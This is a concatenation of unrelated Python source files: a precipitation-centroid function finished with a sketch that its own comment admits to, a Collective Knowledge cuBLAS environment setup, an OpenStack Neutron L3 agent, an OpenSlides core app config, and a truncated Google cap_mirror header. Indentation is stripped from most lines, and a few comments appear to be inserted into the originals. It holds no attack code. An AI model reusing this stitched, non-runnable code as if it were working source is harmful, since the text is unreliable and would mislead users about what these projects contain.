def precip_centroid(precip, lat=None, latmin=-20, latmax=20, N=10):
"""Return the centroid defined as:
integral[lat * (cos(lat)*precip)^N] / integral[(cos(lat)*precip)^N]
where the integral is dlat from latmin to latmax
"""
if lat is None:
lat = atm.get_coord(precip, 'lat')
latrad = np.radians(lat)
    coslat = np.cos(latrad)
    # The original source is truncated here; what follows is a completion
    # sketch implementing the docstring formula with trapezoidal integration
    # (assumes latitude is the last axis of precip).
    mask = (lat >= latmin) & (lat <= latmax)
    lat_s = np.asarray(lat)[mask]
    weights = (np.asarray(coslat)[mask] * np.asarray(precip)[..., mask]) ** N
    lat_c = (np.trapz(lat_s * weights, lat_s, axis=-1) /
             np.trapz(weights, lat_s, axis=-1))
    return lat_c
#
# Collective Knowledge (individual environment - setup)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
import os
##############################################################################
# customize directories to automatically find and register software
def dirs(i):
hosd=i.get('host_os_dict',{})
tosd=i.get('target_os_dict',{})
phosd=hosd.get('ck_name','')
hbits=hosd.get('bits','')
ptosd=tosd.get('ck_name','')
lst=i['dirs']
dirs=lst
if ptosd=='win':
dirs=[]
for p in lst:
dirs.append(os.path.join(p, 'NVIDIA GPU Computing Toolkit\\CUDA'))
return {'return':0, 'dirs':dirs}
##############################################################################
# get version from path
def version_cmd(i):
ck=i['ck_kernel']
fp=i['full_path']
fn=os.path.basename(fp)
rfp=os.path.realpath(fp)
rfn=os.path.basename(rfp)
ver=''
if rfn.startswith(fn):
ver=rfn[len(fn)+1:]
if ver!='':
ver='api-'+ver
return {'return':0, 'cmd':'', 'version':ver}
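# Example: if full_path points at .../lib64/libcublas.so and the symlink
# resolves to libcublas.so.9.0, then fn='libcublas.so', rfn='libcublas.so.9.0'
# and the detected version is 'api-9.0'.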
##############################################################################
# setup environment
def setup(i):
"""
Input: {
cfg - meta of this soft entry
self_cfg - meta of module soft
ck_kernel - import CK kernel module (to reuse functions)
host_os_uoa - host OS UOA
host_os_uid - host OS UID
host_os_dict - host OS meta
target_os_uoa - target OS UOA
target_os_uid - target OS UID
target_os_dict - target OS meta
target_device_id - target device ID (if via ADB)
tags - list of tags used to search this entry
env - updated environment vars from meta
customize - updated customize vars from meta
deps - resolved dependencies for this soft
interactive - if 'yes', can ask questions, otherwise quiet
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
bat - prepared string for bat file
}
"""
import os
# Get variables
ck=i['ck_kernel']
s=''
iv=i.get('interactive','')
cus=i.get('customize',{})
fp=cus.get('full_path','')
hosd=i['host_os_dict']
tosd=i['target_os_dict']
# Check platform
hplat=hosd.get('ck_name','')
hproc=hosd.get('processor','')
tproc=tosd.get('processor','')
remote=tosd.get('remote','')
tbits=tosd.get('bits','')
env=i['env']
pi=fp
found=False
while True:
if os.path.isdir(os.path.join(pi,'lib')) or os.path.isdir(os.path.join(pi,'lib64')):
found=True
break
pix=os.path.dirname(pi)
if pix==pi:
break
pi=pix
if not found:
return {'return':1, 'error':'can\'t find root dir of this installation'}
############################################################
# Setting environment depending on the platform
if hplat=='win':
pl=''
pinc=''
if fp!='':
pl=os.path.dirname(fp)
cus['path_lib']=pl
pl1=os.path.dirname(pl)
pl2=os.path.dirname(pl1)
pi=''
if os.path.isfile(os.path.join(pl1,'include','cublas.h')):
pi=pl1
elif os.path.isfile(os.path.join(pl2,'include','cublas.h')):
pi=pl2
pb=''
se=cus.get('skip_ext','')
# if Windows + CUDA
if remote=='yes':
return {'return':1, 'error':'this software doesn\'t support Android'}
else:
ext='x64'
if tbits=='32':
ext='Win32'
pb=pi+'\\bin'
if pl=='':
pl=pi+'\\lib\\'+ext
if pb!='': cus['path_bin']=pb
if pl!='': cus['path_lib']=pl
if pi!='': cus['path_include']=pi+'\\include'
if remote=='yes':
cus['dynamic_lib']='cublas.so'
else:
cus['static_lib']='cublas.lib'
cus['include_name']='cublas.h'
else:
### Linux ###
lb=os.path.basename(fp)
if lb=='': lb='libcublas.so'
pl=os.path.dirname(fp)
cus['path_lib']=pl
pl1=os.path.dirname(pl)
pl2=os.path.dirname(pl1)
pb=''
if os.path.isdir(os.path.join(pl1,'bin')):
pb=pl1
elif os.path.isdir(os.path.join(pl2,'bin')):
pb=pl2
if pb!='':
cus['path_bin']=os.path.join(pb,'bin')
pi=''
if os.path.isfile(os.path.join(pl1,'include','cublas.h')):
pi=pl1
elif os.path.isfile(os.path.join(pl2,'include','cublas.h')):
pi=pl2
if pi=='':
if os.path.isfile('/usr/include/cublas.h'):
pi='/usr'
elif os.path.isfile('/usr/local/include/cublas.h'):
pi='/usr/local'
if pi!='':
cus['path_include']=os.path.join(pi,'include')
cus['include_name']='cublas.h'
cus['static_lib']=lb
cus['dynamic_lib']=lb
r = ck.access({'action': 'lib_path_export_script', 'module_uoa': 'os', 'host_os_dict': hosd,
'lib_path': cus.get('path_lib','')})
if r['return']>0: return r
s += r['script']
ep=cus.get('env_prefix','')
if pi!='' and ep!='':
env[ep]=pi
if remote=='yes':
cus['skip_copy_to_remote']='yes'
env[ep+'_INCLUDE_NAME']=cus.get('include_name','')
env[ep+'_STATIC_NAME']=cus.get('static_lib','')
env[ep+'_DYNAMIC_NAME']=cus.get('dynamic_lib','')
return {'return':0, 'bat':s}
# Copyright 2012 VMware, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import eventlet
import netaddr
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging
from oslo_service import loopingcall
from oslo_service import periodic_task
from oslo_utils import excutils
from oslo_utils import timeutils
from neutron.agent.common import utils as common_utils
from neutron.agent.l3 import dvr
from neutron.agent.l3 import dvr_edge_router as dvr_router
from neutron.agent.l3 import dvr_local_router as dvr_local_router
from neutron.agent.l3 import ha
from neutron.agent.l3 import ha_router
from neutron.agent.l3 import legacy_router
from neutron.agent.l3 import namespace_manager
from neutron.agent.l3 import namespaces
from neutron.agent.l3 import router_info as rinf
from neutron.agent.l3 import router_processing_queue as queue
from neutron.agent.linux import external_process
from neutron.agent.linux import ip_lib
from neutron.agent.linux import pd
from neutron.agent.metadata import driver as metadata_driver
from neutron.agent import rpc as agent_rpc
from neutron.callbacks import events
from neutron.callbacks import registry
from neutron.callbacks import resources
from neutron.common import constants as l3_constants
from neutron.common import exceptions as n_exc
from neutron.common import ipv6_utils
from neutron.common import rpc as n_rpc
from neutron.common import topics
from neutron import context as n_context
from neutron.i18n import _LE, _LI, _LW
from neutron import manager
try:
from neutron_fwaas.services.firewall.agents.l3reference \
import firewall_l3_agent
except Exception:
# TODO(dougw) - REMOVE THIS FROM NEUTRON; during l3_agent refactor only
from neutron.services.firewall.agents.l3reference import firewall_l3_agent
LOG = logging.getLogger(__name__)
# TODO(Carl) Following constants retained to increase SNR during refactoring
NS_PREFIX = namespaces.NS_PREFIX
INTERNAL_DEV_PREFIX = namespaces.INTERNAL_DEV_PREFIX
EXTERNAL_DEV_PREFIX = namespaces.EXTERNAL_DEV_PREFIX
class L3PluginApi(object):
"""Agent side of the l3 agent RPC API.
API version history:
1.0 - Initial version.
1.1 - Floating IP operational status updates
1.2 - DVR support: new L3 plugin methods added.
- get_ports_by_subnet
- get_agent_gateway_port
Needed by the agent when operating in DVR/DVR_SNAT mode
1.3 - Get the list of activated services
        1.4 - Added L3 HA update_router_state. This method was reworked
              in 1.5 into update_ha_routers_states.
1.5 - Added update_ha_routers_states
1.6 - Added process_prefix_update
1.7 - DVR support: new L3 plugin methods added.
- delete_agent_gateway_port
"""
def __init__(self, topic, host):
self.host = host
target = oslo_messaging.Target(topic=topic, version='1.0')
self.client = n_rpc.get_client(target)
def get_routers(self, context, router_ids=None):
"""Make a remote process call to retrieve the sync data for routers."""
cctxt = self.client.prepare()
return cctxt.call(context, 'sync_routers', host=self.host,
router_ids=router_ids)
def get_external_network_id(self, context):
"""Make a remote process call to retrieve the external network id.
@raise oslo_messaging.RemoteError: with TooManyExternalNetworks as
exc_type if there are more than one
external network
"""
cctxt = self.client.prepare()
return cctxt.call(context, 'get_external_network_id', host=self.host)
def update_floatingip_statuses(self, context, router_id, fip_statuses):
"""Call the plugin update floating IPs's operational status."""
cctxt = self.client.prepare(version='1.1')
return cctxt.call(context, 'update_floatingip_statuses',
router_id=router_id, fip_statuses=fip_statuses)
def get_ports_by_subnet(self, context, subnet_id):
"""Retrieve ports by subnet id."""
cctxt = self.client.prepare(version='1.2')
return cctxt.call(context, 'get_ports_by_subnet', host=self.host,
subnet_id=subnet_id)
def get_agent_gateway_port(self, context, fip_net):
"""Get or create an agent_gateway_port."""
cctxt = self.client.prepare(version='1.2')
return cctxt.call(context, 'get_agent_gateway_port',
network_id=fip_net, host=self.host)
def get_service_plugin_list(self, context):
"""Make a call to get the list of activated services."""
cctxt = self.client.prepare(version='1.3')
return cctxt.call(context, 'get_service_plugin_list')
def update_ha_routers_states(self, context, states):
"""Update HA routers states."""
cctxt = self.client.prepare(version='1.5')
return cctxt.call(context, 'update_ha_routers_states',
host=self.host, states=states)
def process_prefix_update(self, context, prefix_update):
"""Process prefix update whenever prefixes get changed."""
cctxt = self.client.prepare(version='1.6')
return cctxt.call(context, 'process_prefix_update',
subnets=prefix_update)
def delete_agent_gateway_port(self, context, fip_net):
"""Delete Floatingip_agent_gateway_port."""
cctxt = self.client.prepare(version='1.7')
return cctxt.call(context, 'delete_agent_gateway_port',
host=self.host, network_id=fip_net)
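# Usage sketch: the agent below creates one client instance and issues
# versioned RPC calls against the l3 plugin, e.g.
#   plugin_rpc = L3PluginApi(topics.L3PLUGIN, host)
#   routers = plugin_rpc.get_routers(context, router_ids=[router_id])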
class L3NATAgent(firewall_l3_agent.FWaaSL3AgentRpcCallback,
ha.AgentMixin,
dvr.AgentMixin,
manager.Manager):
"""Manager for L3NatAgent
API version history:
        1.0 - Initial version.
1.1 changed the type of the routers parameter
to the routers_updated method.
It was previously a list of routers in dict format.
It is now a list of router IDs only.
Per rpc versioning rules, it is backwards compatible.
1.2 - DVR support: new L3 agent methods added.
- add_arp_entry
- del_arp_entry
Needed by the L3 service when dealing with DVR
"""
target = oslo_messaging.Target(version='1.2')
def __init__(self, host, conf=None):
if conf:
self.conf = conf
else:
self.conf = cfg.CONF
self.router_info = {}
self._check_config_params()
self.process_monitor = external_process.ProcessMonitor(
config=self.conf,
resource_type='router')
self.driver = common_utils.load_interface_driver(self.conf)
self.context = n_context.get_admin_context_without_session()
self.plugin_rpc = L3PluginApi(topics.L3PLUGIN, host)
self.fullsync = True
# Get the list of service plugins from Neutron Server
# This is the first place where we contact neutron-server on startup
# so retry in case its not ready to respond.
retry_count = 5
while True:
retry_count = retry_count - 1
try:
self.neutron_service_plugins = (
self.plugin_rpc.get_service_plugin_list(self.context))
except oslo_messaging.RemoteError as e:
with excutils.save_and_reraise_exception() as ctx:
ctx.reraise = False
                    LOG.warning(_LW('l3-agent cannot check which service '
                                    'plugins are enabled on the neutron '
                                    'server at startup due to an RPC error. '
                                    'This happens when the server does not '
                                    'support this RPC API. If the error is '
                                    'UnsupportedVersion you can ignore this '
                                    'warning. Detail message: %s'), e)
self.neutron_service_plugins = None
except oslo_messaging.MessagingTimeout as e:
with excutils.save_and_reraise_exception() as ctx:
if retry_count > 0:
ctx.reraise = False
LOG.warning(_LW('l3-agent cannot check service '
'plugins enabled on the neutron '
'server. Retrying. '
'Detail message: %s'), e)
continue
break
self.metadata_driver = None
if self.conf.enable_metadata_proxy:
self.metadata_driver = metadata_driver.MetadataDriver(self)
self.namespaces_manager = namespace_manager.NamespaceManager(
self.conf,
self.driver,
self.conf.use_namespaces,
self.metadata_driver)
self._queue = queue.RouterProcessingQueue()
super(L3NATAgent, self).__init__(conf=self.conf)
self.target_ex_net_id = None
self.use_ipv6 = ipv6_utils.is_enabled()
self.pd = pd.PrefixDelegation(self.context, self.process_monitor,
self.driver,
self.plugin_rpc.process_prefix_update,
self.create_pd_router_update,
self.conf)
def _check_config_params(self):
"""Check items in configuration files.
Check for required and invalid configuration items.
The actual values are not verified for correctness.
"""
if not self.conf.interface_driver:
msg = _LE('An interface driver must be specified')
LOG.error(msg)
raise SystemExit(1)
if not self.conf.use_namespaces and not self.conf.router_id:
msg = _LE('Router id is required if not using namespaces.')
LOG.error(msg)
raise SystemExit(1)
if self.conf.ipv6_gateway:
# ipv6_gateway configured. Check for valid v6 link-local address.
try:
                msg = _LE("%s used in config as ipv6_gateway is not a valid "
                          "IPv6 link-local address.")
ip_addr = netaddr.IPAddress(self.conf.ipv6_gateway)
if ip_addr.version != 6 or not ip_addr.is_link_local():
LOG.error(msg, self.conf.ipv6_gateway)
raise SystemExit(1)
except netaddr.AddrFormatError:
LOG.error(msg, self.conf.ipv6_gateway)
raise SystemExit(1)
def _fetch_external_net_id(self, force=False):
"""Find UUID of single external network for this agent."""
if self.conf.gateway_external_network_id:
return self.conf.gateway_external_network_id
# L3 agent doesn't use external_network_bridge to handle external
# networks, so bridge_mappings with provider networks will be used
# and the L3 agent is able to handle any external networks.
if not self.conf.external_network_bridge:
return
if not force and self.target_ex_net_id:
return self.target_ex_net_id
try:
self.target_ex_net_id = self.plugin_rpc.get_external_network_id(
self.context)
return self.target_ex_net_id
except oslo_messaging.RemoteError as e:
with excutils.save_and_reraise_exception() as ctx:
if e.exc_type == 'TooManyExternalNetworks':
ctx.reraise = False
msg = _(
"The 'gateway_external_network_id' option must be "
"configured for this agent as Neutron has more than "
"one external network.")
raise Exception(msg)
def _create_router(self, router_id, router):
# TODO(Carl) We need to support a router that is both HA and DVR. The
# patch that enables it will replace these lines. See bug #1365473.
if router.get('distributed') and router.get('ha'):
raise n_exc.DvrHaRouterNotSupported(router_id=router_id)
args = []
kwargs = {
'router_id': router_id,
'router': router,
'use_ipv6': self.use_ipv6,
'agent_conf': self.conf,
'interface_driver': self.driver,
}
if router.get('distributed'):
kwargs['agent'] = self
kwargs['host'] = self.host
if self.conf.agent_mode == l3_constants.L3_AGENT_MODE_DVR_SNAT:
return dvr_router.DvrEdgeRouter(*args, **kwargs)
else:
return dvr_local_router.DvrLocalRouter(*args, **kwargs)
if router.get('ha'):
kwargs['state_change_callback'] = self.enqueue_state_change
return ha_router.HaRouter(*args, **kwargs)
return legacy_router.LegacyRouter(*args, **kwargs)
def _router_added(self, router_id, router):
ri = self._create_router(router_id, router)
registry.notify(resources.ROUTER, events.BEFORE_CREATE,
self, router=ri)
self.router_info[router_id] = ri
ri.initialize(self.process_monitor)
# TODO(Carl) This is a hook in to fwaas. It should be cleaned up.
self.process_router_add(ri)
def _safe_router_removed(self, router_id):
"""Try to delete a router and return True if successful."""
try:
self._router_removed(router_id)
except Exception:
LOG.exception(_LE('Error while deleting router %s'), router_id)
return False
else:
return True
def _router_removed(self, router_id):
ri = self.router_info.get(router_id)
if ri is None:
LOG.warn(_LW("Info for router %s was not found. "
"Performing router cleanup"), router_id)
self.namespaces_manager.ensure_router_cleanup(router_id)
return
registry.notify(resources.ROUTER, events.BEFORE_DELETE,
self, router=ri)
ri.delete(self)
del self.router_info[router_id]
registry.notify(resources.ROUTER, events.AFTER_DELETE, self, router=ri)
def update_fip_statuses(self, ri, existing_floating_ips, fip_statuses):
# Identify floating IPs which were disabled
ri.floating_ips = set(fip_statuses.keys())
for fip_id in existing_floating_ips - ri.floating_ips:
fip_statuses[fip_id] = l3_constants.FLOATINGIP_STATUS_DOWN
# filter out statuses that didn't change
fip_statuses = {f: stat for f, stat in fip_statuses.items()
if stat != rinf.FLOATINGIP_STATUS_NOCHANGE}
if not fip_statuses:
return
LOG.debug('Sending floating ip statuses: %s', fip_statuses)
# Update floating IP status on the neutron server
self.plugin_rpc.update_floatingip_statuses(
self.context, ri.router_id, fip_statuses)
def router_deleted(self, context, router_id):
"""Deal with router deletion RPC message."""
LOG.debug('Got router deleted notification for %s', router_id)
update = queue.RouterUpdate(router_id,
queue.PRIORITY_RPC,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def routers_updated(self, context, routers):
"""Deal with routers modification and creation RPC message."""
LOG.debug('Got routers updated notification :%s', routers)
if routers:
# This is needed for backward compatibility
if isinstance(routers[0], dict):
routers = [router['id'] for router in routers]
for id in routers:
update = queue.RouterUpdate(id, queue.PRIORITY_RPC)
self._queue.add(update)
def router_removed_from_agent(self, context, payload):
LOG.debug('Got router removed from agent :%r', payload)
router_id = payload['router_id']
update = queue.RouterUpdate(router_id,
queue.PRIORITY_RPC,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def router_added_to_agent(self, context, payload):
LOG.debug('Got router added to agent :%r', payload)
self.routers_updated(context, payload)
def _process_router_if_compatible(self, router):
if (self.conf.external_network_bridge and
not ip_lib.device_exists(self.conf.external_network_bridge)):
LOG.error(_LE("The external network bridge '%s' does not exist"),
self.conf.external_network_bridge)
return
# If namespaces are disabled, only process the router associated
# with the configured agent id.
if (not self.conf.use_namespaces and
router['id'] != self.conf.router_id):
raise n_exc.RouterNotCompatibleWithAgent(router_id=router['id'])
# Either ex_net_id or handle_internal_only_routers must be set
ex_net_id = (router['external_gateway_info'] or {}).get('network_id')
if not ex_net_id and not self.conf.handle_internal_only_routers:
raise n_exc.RouterNotCompatibleWithAgent(router_id=router['id'])
# If target_ex_net_id and ex_net_id are set they must be equal
target_ex_net_id = self._fetch_external_net_id()
if (target_ex_net_id and ex_net_id and ex_net_id != target_ex_net_id):
# Double check that our single external_net_id has not changed
# by forcing a check by RPC.
if ex_net_id != self._fetch_external_net_id(force=True):
raise n_exc.RouterNotCompatibleWithAgent(
router_id=router['id'])
if router['id'] not in self.router_info:
self._process_added_router(router)
else:
self._process_updated_router(router)
def _process_added_router(self, router):
self._router_added(router['id'], router)
ri = self.router_info[router['id']]
ri.router = router
ri.process(self)
registry.notify(resources.ROUTER, events.AFTER_CREATE, self, router=ri)
def _process_updated_router(self, router):
ri = self.router_info[router['id']]
ri.router = router
registry.notify(resources.ROUTER, events.BEFORE_UPDATE,
self, router=ri)
ri.process(self)
registry.notify(resources.ROUTER, events.AFTER_UPDATE, self, router=ri)
def _process_router_update(self):
for rp, update in self._queue.each_update_to_next_router():
LOG.debug("Starting router update for %s, action %s, priority %s",
update.id, update.action, update.priority)
if update.action == queue.PD_UPDATE:
self.pd.process_prefix_update()
continue
router = update.router
if update.action != queue.DELETE_ROUTER and not router:
try:
update.timestamp = timeutils.utcnow()
routers = self.plugin_rpc.get_routers(self.context,
[update.id])
except Exception:
msg = _LE("Failed to fetch router information for '%s'")
LOG.exception(msg, update.id)
self.fullsync = True
continue
if routers:
router = routers[0]
if not router:
removed = self._safe_router_removed(update.id)
if not removed:
# TODO(Carl) Stop this fullsync non-sense. Just retry this
# one router by sticking the update at the end of the queue
# at a lower priority.
self.fullsync = True
else:
# need to update timestamp of removed router in case
# there are older events for the same router in the
# processing queue (like events from fullsync) in order to
# prevent deleted router re-creation
rp.fetched_and_processed(update.timestamp)
continue
try:
self._process_router_if_compatible(router)
except n_exc.RouterNotCompatibleWithAgent as e:
LOG.exception(e.msg)
# Was the router previously handled by this agent?
if router['id'] in self.router_info:
LOG.error(_LE("Removing incompatible router '%s'"),
router['id'])
self._safe_router_removed(router['id'])
except Exception:
msg = _LE("Failed to process compatible router '%s'")
LOG.exception(msg, update.id)
self.fullsync = True
continue
LOG.debug("Finished a router update for %s", update.id)
rp.fetched_and_processed(update.timestamp)
def _process_routers_loop(self):
LOG.debug("Starting _process_routers_loop")
pool = eventlet.GreenPool(size=8)
while True:
pool.spawn_n(self._process_router_update)
# NOTE(kevinbenton): this is set to 1 second because the actual interval
# is controlled by a FixedIntervalLoopingCall in neutron/service.py that
# is responsible for task execution.
@periodic_task.periodic_task(spacing=1)
def periodic_sync_routers_task(self, context):
self.process_services_sync(context)
if not self.fullsync:
return
LOG.debug("Starting fullsync periodic_sync_routers_task")
# self.fullsync is True at this point. If an exception -- caught or
# uncaught -- prevents setting it to False below then the next call
# to periodic_sync_routers_task will re-enter this code and try again.
# Context manager self.namespaces_manager captures a picture of
# namespaces *before* fetch_and_sync_all_routers fetches the full list
# of routers from the database. This is important to correctly
# identify stale ones.
try:
with self.namespaces_manager as ns_manager:
self.fetch_and_sync_all_routers(context, ns_manager)
except n_exc.AbortSyncRouters:
self.fullsync = True
def fetch_and_sync_all_routers(self, context, ns_manager):
prev_router_ids = set(self.router_info)
timestamp = timeutils.utcnow()
try:
if self.conf.use_namespaces:
routers = self.plugin_rpc.get_routers(context)
else:
routers = self.plugin_rpc.get_routers(context,
[self.conf.router_id])
except oslo_messaging.MessagingException:
LOG.exception(_LE("Failed synchronizing routers due to RPC error"))
raise n_exc.AbortSyncRouters()
else:
LOG.debug('Processing :%r', routers)
for r in routers:
ns_manager.keep_router(r['id'])
if r.get('distributed'):
# need to keep fip namespaces as well
ext_net_id = (r['external_gateway_info'] or {}).get(
'network_id')
if ext_net_id:
ns_manager.keep_ext_net(ext_net_id)
update = queue.RouterUpdate(r['id'],
queue.PRIORITY_SYNC_ROUTERS_TASK,
router=r,
timestamp=timestamp)
self._queue.add(update)
self.fullsync = False
LOG.debug("periodic_sync_routers_task successfully completed")
curr_router_ids = set([r['id'] for r in routers])
# Delete routers that have disappeared since the last sync
for router_id in prev_router_ids - curr_router_ids:
ns_manager.keep_router(router_id)
update = queue.RouterUpdate(router_id,
queue.PRIORITY_SYNC_ROUTERS_TASK,
timestamp=timestamp,
action=queue.DELETE_ROUTER)
self._queue.add(update)
def after_start(self):
        # Note: the FWaaS' vArmourL3NATAgent is a subclass of L3NATAgent and
        # calls this method, so removing this after_start() would break it.
        # We need to find out whether vArmourL3NATAgent can have
        # L3NATAgentWithStateReport as its base class instead of L3NATAgent.
eventlet.spawn_n(self._process_routers_loop)
LOG.info(_LI("L3 agent started"))
# When L3 agent is ready, we immediately do a full sync
self.periodic_sync_routers_task(self.context)
def create_pd_router_update(self):
router_id = None
update = queue.RouterUpdate(router_id,
queue.PRIORITY_PD_UPDATE,
timestamp=timeutils.utcnow(),
action=queue.PD_UPDATE)
self._queue.add(update)
class L3NATAgentWithStateReport(L3NATAgent):
def __init__(self, host, conf=None):
self.use_call = True
super(L3NATAgentWithStateReport, self).__init__(host=host, conf=conf)
self.state_rpc = agent_rpc.PluginReportStateAPI(topics.PLUGIN)
self.agent_state = {
'binary': 'neutron-l3-agent',
'host': host,
'topic': topics.L3_AGENT,
'configurations': {
'agent_mode': self.conf.agent_mode,
'use_namespaces': self.conf.use_namespaces,
'router_id': self.conf.router_id,
'handle_internal_only_routers':
self.conf.handle_internal_only_routers,
'external_network_bridge': self.conf.external_network_bridge,
'gateway_external_network_id':
self.conf.gateway_external_network_id,
'interface_driver': self.conf.interface_driver,
'log_agent_heartbeats': self.conf.AGENT.log_agent_heartbeats},
'start_flag': True,
'agent_type': l3_constants.AGENT_TYPE_L3}
report_interval = self.conf.AGENT.report_interval
if report_interval:
self.heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
self.heartbeat.start(interval=report_interval)
def _report_state(self):
num_ex_gw_ports = 0
num_interfaces = 0
num_floating_ips = 0
router_infos = self.router_info.values()
num_routers = len(router_infos)
for ri in router_infos:
ex_gw_port = ri.get_ex_gw_port()
if ex_gw_port:
num_ex_gw_ports += 1
num_interfaces += len(ri.router.get(l3_constants.INTERFACE_KEY,
[]))
num_floating_ips += len(ri.router.get(l3_constants.FLOATINGIP_KEY,
[]))
configurations = self.agent_state['configurations']
configurations['routers'] = num_routers
configurations['ex_gw_ports'] = num_ex_gw_ports
configurations['interfaces'] = num_interfaces
configurations['floating_ips'] = num_floating_ips
try:
self.state_rpc.report_state(self.context, self.agent_state,
self.use_call)
self.agent_state.pop('start_flag', None)
self.use_call = False
except AttributeError:
# This means the server does not support report_state
LOG.warn(_LW("Neutron server does not support state report."
" State report for this agent will be disabled."))
self.heartbeat.stop()
return
except Exception:
LOG.exception(_LE("Failed reporting state!"))
def after_start(self):
eventlet.spawn_n(self._process_routers_loop)
LOG.info(_LI("L3 agent started"))
# Do the report state before we do the first full sync.
self._report_state()
# When L3 agent is ready, we immediately do a full sync
self.periodic_sync_routers_task(self.context)
self.pd.after_start()
def agent_updated(self, context, payload):
"""Handle the agent_updated notification event."""
self.fullsync = True
LOG.info(_LI("agent_updated by server side %s!"), payload)
import sys
from collections import OrderedDict
from operator import attrgetter
from typing import Any, Dict, List, Set
from django.apps import AppConfig
from django.conf import settings
from django.db.models.signals import post_migrate
class CoreAppConfig(AppConfig):
name = "openslides.core"
verbose_name = "OpenSlides Core"
angular_site_module = True
def ready(self):
# Import all required stuff.
from .config import config
from .projector import register_projector_elements
from . import serializers # noqa
from .signals import (
delete_django_app_permissions,
get_permission_change_data,
permission_change,
post_permission_creation,
)
from .views import (
ChatMessageViewSet,
ConfigViewSet,
CountdownViewSet,
HistoryViewSet,
ProjectorMessageViewSet,
ProjectorViewSet,
TagViewSet,
)
from .websocket import (
NotifyWebsocketClientMessage,
ConstantsWebsocketClientMessage,
GetElementsWebsocketClientMessage,
AutoupdateWebsocketClientMessage,
ListenToProjectors,
)
from ..utils.access_permissions import required_user
from ..utils.cache import element_cache
from ..utils.constants import set_constants, get_constants_from_apps
from ..utils.rest_api import router
from ..utils.websocket import register_client_message
# Collect all config variables before getting the constants.
config.collect_config_variables_from_apps()
# Skip all database related accesses during migrations.
is_normal_server_start = False
for sys_part in sys.argv:
for entry in ("runserver", "gunicorn", "daphne", "create-example-data"):
if sys_part.endswith(entry):
is_normal_server_start = True
break
# Set constants
if is_normal_server_start:
set_constants(get_constants_from_apps())
# Define projector elements.
register_projector_elements()
# Connect signals.
post_permission_creation.connect(
delete_django_app_permissions, dispatch_uid="delete_django_app_permissions"
)
permission_change.connect(
get_permission_change_data, dispatch_uid="core_get_permission_change_data"
)
post_migrate.connect(
call_save_default_values,
sender=self,
dispatch_uid="core_save_config_default_values",
)
# Register viewsets.
router.register(
self.get_model("Projector").get_collection_string(), ProjectorViewSet
)
router.register(
self.get_model("ChatMessage").get_collection_string(), ChatMessageViewSet
)
router.register(self.get_model("Tag").get_collection_string(), TagViewSet)
router.register(
self.get_model("ConfigStore").get_collection_string(),
ConfigViewSet,
"config",
)
router.register(
self.get_model("ProjectorMessage").get_collection_string(),
ProjectorMessageViewSet,
)
router.register(
self.get_model("Countdown").get_collection_string(), CountdownViewSet
)
router.register(
self.get_model("History").get_collection_string(), HistoryViewSet
)
# Sets the cache and builds the startup history
if is_normal_server_start:
element_cache.ensure_cache()
self.get_model("History").objects.build_history()
# Register client messages
register_client_message(NotifyWebsocketClientMessage())
register_client_message(ConstantsWebsocketClientMessage())
register_client_message(GetElementsWebsocketClientMessage())
register_client_message(AutoupdateWebsocketClientMessage())
register_client_message(ListenToProjectors())
# register required_users
required_user.add_collection_string(
self.get_model("ChatMessage").get_collection_string(), required_users
)
def get_config_variables(self):
from .config_variables import get_config_variables
return get_config_variables()
def get_startup_elements(self):
"""
        Yields all Cachables required on startup, i.e. on opening the
        websocket connection.
"""
for model_name in (
"Projector",
"ChatMessage",
"Tag",
"ProjectorMessage",
"Countdown",
"ConfigStore",
"History",
):
yield self.get_model(model_name)
def get_angular_constants(self):
from .config import config
constants: Dict[str, Any] = {}
# Client settings
client_settings_keys = [
"MOTION_IDENTIFIER_MIN_DIGITS",
"MOTION_IDENTIFIER_WITHOUT_BLANKS",
"MOTIONS_ALLOW_AMENDMENTS_OF_AMENDMENTS",
]
client_settings_dict = {}
for key in client_settings_keys:
try:
client_settings_dict[key] = getattr(settings, key)
except AttributeError:
# Settings key does not exist. Do nothing. The client will
# treat this as undefined.
pass
constants["OpenSlidesSettings"] = client_settings_dict
# Config variables
config_groups: List[Any] = []
for config_variable in sorted(
config.config_variables.values(), key=attrgetter("weight")
):
if config_variable.is_hidden():
# Skip hidden config variables. Do not even check groups and subgroups.
continue
if not config_groups or config_groups[-1]["name"] != config_variable.group:
# Add new group.
config_groups.append(
OrderedDict(name=config_variable.group, subgroups=[])
)
if (
not config_groups[-1]["subgroups"]
or config_groups[-1]["subgroups"][-1]["name"]
!= config_variable.subgroup
):
# Add new subgroup.
config_groups[-1]["subgroups"].append(
OrderedDict(name=config_variable.subgroup, items=[])
)
# Add the config variable to the current group and subgroup.
config_groups[-1]["subgroups"][-1]["items"].append(config_variable.data)
constants["OpenSlidesConfigVariables"] = config_groups
return constants
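# Shape sketch of the result built above: constants["OpenSlidesConfigVariables"]
# is a weight-sorted list of groups, e.g.
#   [OrderedDict(name=<group>, subgroups=[
#       OrderedDict(name=<subgroup>, items=[<config_variable.data>, ...])])]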
def call_save_default_values(**kwargs):
from .config import config
config.save_default_values()
def required_users(element: Dict[str, Any]) -> Set[int]:
"""
Returns all user ids that are displayed as chatters.
"""
    # A chat message has a single author, so wrap the id to return a set.
    return {element["user_id"]}
#!/usr/bin/python2.4
#
# Copyright 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Query interface to the Datastore populated by cap_mirror."""
__author__ = 'Matthew.H.Frantz@gmail.com (Matt Frantz)'
import logging
import traceback
